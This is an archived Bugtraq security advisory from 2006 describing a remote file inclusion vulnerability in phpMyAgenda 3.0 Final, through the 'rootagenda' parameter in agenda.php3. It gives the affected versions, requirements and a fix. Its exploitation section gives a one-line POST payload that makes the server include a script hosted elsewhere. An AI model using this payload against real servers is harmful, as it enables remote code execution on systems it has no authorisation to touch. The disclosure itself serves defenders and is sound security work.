Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: [MajorSecurity] phpMyAgenda 3.0 Final - Remote File Include Vulnerability

[MajorSecurity] phpMyAgenda 3.0 Final - Remote File Include Vulnerability

From: <admin_at_majorsecurity.de>
Date: 24 Apr 2006 15:12:55 -0000
('binary' encoding is not supported, stored as-is) [MajorSecurity] phpMyAgenda 3.0 Final - Remote File Include Vulnerability
--------------------------------------------------------
Software: phpMyAgenda
Version: 3.0 Final
Type: Remote File Include Vulnerability
Date: April, 24th 2006
Vendor: phpMyAgenda
Page: http://phpmyagenda.com
Risc: High

Credits:
----------------------------
Discovered by: 'Aesthetico'
http://www.majorsecurity.de

Affected Products:
----------------------------
phpMyAgenda 3.0 Final and prior

Description:
----------------------------
phpMyAgenda is a complete web application that allows you to manage
and publish events (concert, meetings, etc...).
It stores description, dates, places, contacts, event registrations, and event polls.

Requirements:
----------------------------
register_globals = On

Vulnerability:
----------------------------
Input passed to the "rootagenda" parameter in "agenda.php3" is not
properly verified, before it is used to include files.
This can be exploited to execute arbitrary code by including files from external resources.

Solution:
----------------------------
Edit the source code to ensure that input is properly sanitised.

Set "register_globals" to "Off".

Exploitation:
----------------------------
Post data:
rootagenda=http://www.yourspace.com/yourscript.php?
Received on Apr 24 2006

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]